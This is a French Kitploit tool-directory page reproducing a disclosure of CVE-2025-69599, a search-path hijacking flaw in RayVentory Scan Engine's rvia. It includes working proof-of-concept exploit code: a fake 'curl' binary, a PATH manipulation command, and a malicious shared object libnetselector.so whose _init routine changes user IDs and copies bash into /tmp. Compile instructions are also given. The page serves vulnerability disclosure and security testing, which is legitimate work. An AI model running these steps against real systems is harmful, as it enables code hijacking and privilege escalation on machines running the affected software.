Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-69599 | Kitploit
Outils/GitHubGitHub/wise-security/cve-2025-69599
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionAnalyse de BinairesSécurité de la Chaîne Logistique
GitHubwise-security/cve-2025-69599

CVE-2025-69599

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-69599

  • auteur : Rafael José Núñez Gulías
  • entreprise : Iberian Var Group
  • Produits concernés : RayVentory Scan Engine 12.6 Update 8 et versions précédentes
  • Avis Raynet : RSEC200965

rvia de Raynet est vulnérable à un problème d'élément de chemin de recherche non contrôlé. Lors du chargement d'objets partagés et de l'appel de binaires système (tels que .so et binaires auxiliaires), ceux-ci sont appelés avec des chemins relatifs, ce qui permet à un utilisateur de modifier le binaire final ou l'objet .so exécuté par la manipulation de la variable d'environnement PATH.

20251117223200.png

Dans la preuve suivante, un binaire arbitraire nommé curl est créé dans le répertoire /tmp.

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>

int main() {
	system("whoami");
	return 0;
}
root@kitploit:~
gcc curl.c -o curl # Compiling the binary

La variable PATH est modifiée afin que le premier répertoire recherché pour la commande curl lors de son appel par rvia soit /tmp.

root@kitploit:~
export PATH=/tmp:$PATH

Ensuite, un appel à /opt/rvia/rvia getconfig utilisera notre binaire curl modifié.

20251209121335.png

Le même problème s'applique à l'option upload.

20251209121709.png

Le même problème se retrouve lors de l'utilisation de l'option rvia inventory, qui appelle en interne le binaire ndtrack. Le binaire ndtrack appelle les commandes cat et sh en utilisant un chemin relatif.

20251117223833.png

20251224134109.png

Enfin, il a également été détecté que le binaire ndtrack inclut des objets partagés (fichiers .so) en utilisant des chemins relatifs.

20251118093146.png

Dans la preuve suivante, il est possible de voir les étapes suivies pour remplacer l'appel relatif à libnetselector.so (il est également possible d'effectuer les mêmes actions avec libuploader.so). Dans ce cas, un objet partagé personnalisé est créé ; lorsque cet objet partagé est exécuté, une copie de bash dans le répertoire /tmp nommée bash_so_hijack va être créée.

Voici le code C pour créer l'objet partagé personnalisé nommé libnetselector.so

root@kitploit:~
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
	setuid(1001);
	setgid(1001);
	system("cp /bin/bash /tmp/bash_so_hijack");
}
root@kitploit:~
gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # compiling the shared object

20251209131403.png

Il est important de noter que cela ne fonctionne que lors de l'appel direct de ndtrack, car lorsque l'option inventory est invoquée, un appel à un script bash situé dans /opt/rvia et nommé ndtrack est effectué, ce qui définit la variable d'environnement PATH avant d'appeler le binaire ndtrack.

20251223190146.png

Télécharger l’outil